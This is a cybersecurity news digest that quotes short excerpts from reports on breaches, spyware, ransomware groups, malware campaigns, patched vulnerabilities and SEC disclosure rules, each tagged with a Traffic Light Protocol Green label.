Top News

• Here's How to Find if WhatsApp Web Code on Your Browser Has Been Hacked

"Meta Platforms' WhatsApp and Cloudflare have banded together for a new initiative called Code Verify to validate the authenticity of the messaging service's web app on desktop computers."

Link

TLP¹ : Green

• Open database leaves major Chinese ports exposed to shipping chaos

"The freight logs of two major Chinese shipping ports have been leaking data, a problem which if left unresolved could disrupt the supply chain of up to 70,000 tonnes of cargo a day, with potentially serious consequences for international shipping.
The cybernews® research team identified an open ElasticSearch database, which contained more than 243GB of data detailing current and historic ship positions that is exposed to the public. Analyzing the data, the team determined that it is highly likely to belong to the Yangtze river ports of Nanjing and Zhangjiagang."

Link

TLP¹ : Green

• EU Lawmakers to Probe 'Political' Pegasus Spyware Use

"The European Parliament on Thursday created a "committee of inquiry" to probe accusations over the use of Pegasus spyware by governments in the bloc, notably in Hungary and Poland.
Lawmakers voted overwhelmingly to "investigate alleged breaches of EU law in the use of the surveillance software by, among others, Hungary and Poland", a statement said.
The 38-member committee "is going to look into existing national laws regulating surveillance, and whether Pegasus spyware was used for political purposes against, for example, journalists, politicians and lawyers", it said."

Link

TLP¹ : Green

Cybersecurity State: Surveillance, Cyberwarfare, Cybercriminality and Hacktivism

• Russian Pushing New State-run TLS Certificate Authority to Deal With Sanctions

"The Russian government has established its own TLS certificate authority (CA) to address issues with accessing websites that have arisen in the wake of sanctions imposed by the west following the country's unprovoked military invasion of Ukraine."

Link

TLP¹ : Green

• Iranian Hackers Targeting Turkey and Arabian Peninsula in New Malware Campaign

"The Iranian state-sponsored threat actor known as MuddyWater has been attributed to a new swarm of attacks targeting Turkey and the Arabian Peninsula with the goal of deploying remote access trojans (RATs) on compromised systems."

Link

TLP¹ : Green

• Lapsus$ Ransomware gang is looking for insiders willing to sell remote access to major technology corporations and ISPs.

"Lapsus$ ransomware gang announced they’re starting to recruit insiders employed within major technology giants and ISPs, such companies include Microsoft, Apple, EA Games and IBM. Their scope of interests include – major telecommunications companies such as Claro, Telefonica and AT&T."

Link

TLP¹ : Green

• Canadian NetWalker Ransomware Operator Extradited to U.S.

"A former Canadian government employee has been extradited to the United States to face charges related to dozens of NetWalker ransomware attacks.
Charges against the individual – Sebastien Vachon-Desjardins, 34, of Gatineau, Quebec, Canada – were announced last year, when law enforcement authorities in the U.S. and Europe seized the dark web sites used in the NetWalker ransomware operations.
Offered under the ransomware-as-a-service (RaaS) business model, NetWalker – also known as Malito – emerged in 2019 and has been involved in a variety of high-profile attacks, including ones targeting education, government, health, and public transportation organizations."

Link

TLP¹ : Green

• Malware Posing as Russia DDoS Tool Bites Pro-Ukraine Hackers

"Be careful when downloading a tool to cyber-target Russia: It could be an infostealer wolf dressed in sheep’s clothing that grabs your cryptocurrency info instead.
Looking to cyber-hassle Russia, Ukrainian sympathizers? Be careful — malware is making the rounds, disguised as a pro-Ukraine cyber-tool that will turn around and bite you instead, researchers are warning.
In a Wednesday threat advisory, Cisco Talos described a campaign it’s observed in which a threat actor was offering a supposed distributed denial-of-service (DDoS) tool on Telegram, that’s purportedly meant to pummel Russian websites.
In truth, the file is actually the Phoenix infostealer that’s after credentials and cryptocurrency info, according to researchers."

Link

TLP¹ : Green

Breaches: Data Breaches and Hacks

• UK ferry operator Wightlink flags potential data breach after ‘highly sophisticated’ cyber-attack

"UK ferry operator Wightlink has been hit by a “highly sophisticated” cyber-attack that may have compromised personal data belonging to “a small number of customers and staff”.
Wightlink says the attack, which happened in February, affected certain back-office IT systems but not its ferry services, booking system, or website.
Law enforcement and the UK’s Information Commissioner’s Office (ICO) have been notified along with potential breach victims, added the company."

Link

TLP¹ : Green

Vulnerabilities: Vulnerability Advisories, Zero-Days, Patches and Exploits

• Microsoft praised for quickly resolving Azure Automation cloud security vulnerability

"Microsoft has fixed a critical vulnerability in its Azure Automation service that could have allowed a cloud tenant to take full control over resources and data belonging to other customers.
Microsoft Azure Automation is designed to allow customers to schedule jobs, handle input and output, and more, with each customer’s automation code running inside a sandbox, isolated from other customers’ code executing on the same virtual machine.
However, a vulnerability – discovered by Orca Security and dubbed 'AutoWarp' – shattered the sanctity of this virtualized environment."

Link

TLP¹ : Green

• High-Severity Vulnerabilities Patched in Omron PLC Programming Software

"Several high-severity vulnerabilities that can be exploited for remote code execution were patched recently in the CX-Programmer software of Japanese electronics giant Omron.
An advisory released earlier this month by Japan’s JPCERT/CC revealed that the product is affected by five use-after-free and out-of-bounds vulnerabilities, all with a CVSS score of 7.8."

Link

TLP¹ : Green

Incident Response: Infrastructure, Training, SIEM and Incident Handling

• SEC Proposes Four-Day Breach Notification Rules

"The US Securities and Exchange Commission (SEC) has proposed new rules designed to increase transparency around cybersecurity incident reporting.
The regulator wants listed companies to disclose a “material cybersecurity incident” within four business days of discovery. Although all states have laws forcing businesses to disclose data breaches, they typically don’t extend to incidents where personal information isn’t taken.
SEC chair, Gary Gensler, said the regulator’s disclosure regime needed to change to reflect evolving risk and investor needs."

Link

TLP¹ : Green

• Security Teams Prep Too Slowly for Cyberattacks

"Attackers typically take days or weeks to exploit new vulnerabilities, but defenders are slow to learn about critical issues and take action, requiring 96 days on average to learn to identify and block current cyber threats, according to a new report analyzing training and crisis scenarios.
The report, Cyber Workforce Benchmark 2022, found that cybersecurity professionals are much more likely to focus on vulnerabilities that have garnered media attention, such as Log4j, than more understated issues, and that different industries develop their security capabilities at widely different rates."

Link

TLP¹ : Green

Technical Articles: Forensics, Reverse Engineering, Malware, Phishing, Pentesting, Software Security and Cryptography

• Corporate website contact forms used to spread BazarBackdoor malware

"The stealthy BazarBackdoor malware is now being spread via website contact forms rather than typical phishing emails to evade detection by security software.
BazarBackdoor is a stealthy backdoor malware created by the TrickBot group and is now under development by the Conti ransomware operation. This malware provides threat actors remote access to an internal device that can be used as a launchpad for further lateral movement within a network.
The BazarBackdoor malware is usually spread through phishing emails that include malicious documents that download and install the malware. "

Link

TLP¹ : Green

• Microsoft confirms Intune enrollment issue on Android devices

"Microsoft has confirmed a new known issue causing Microsoft Intune enrollment problems on some Android devices after upgrading from Android 11 to Android 12.
Customers impacted by this issue have also reported losing access to Microsoft Intune-managed resources after the upgrade process ends.
"Currently, this includes some OPPO, OnePlus, and Realme devices enrolled as Android Enterprise personally-owned work profile," the Intune Support Team explained."

Link

TLP¹ : Green

¹Traffic Light Protocol (TLP) [1] for information sharing:

• Red:Not for disclosure, restricted to participants only.
• Amber: Limited disclosure, restricted to participants organizations.
• Green: Limited disclosure, restricted to the community.

[1]https://www.first.org/tlp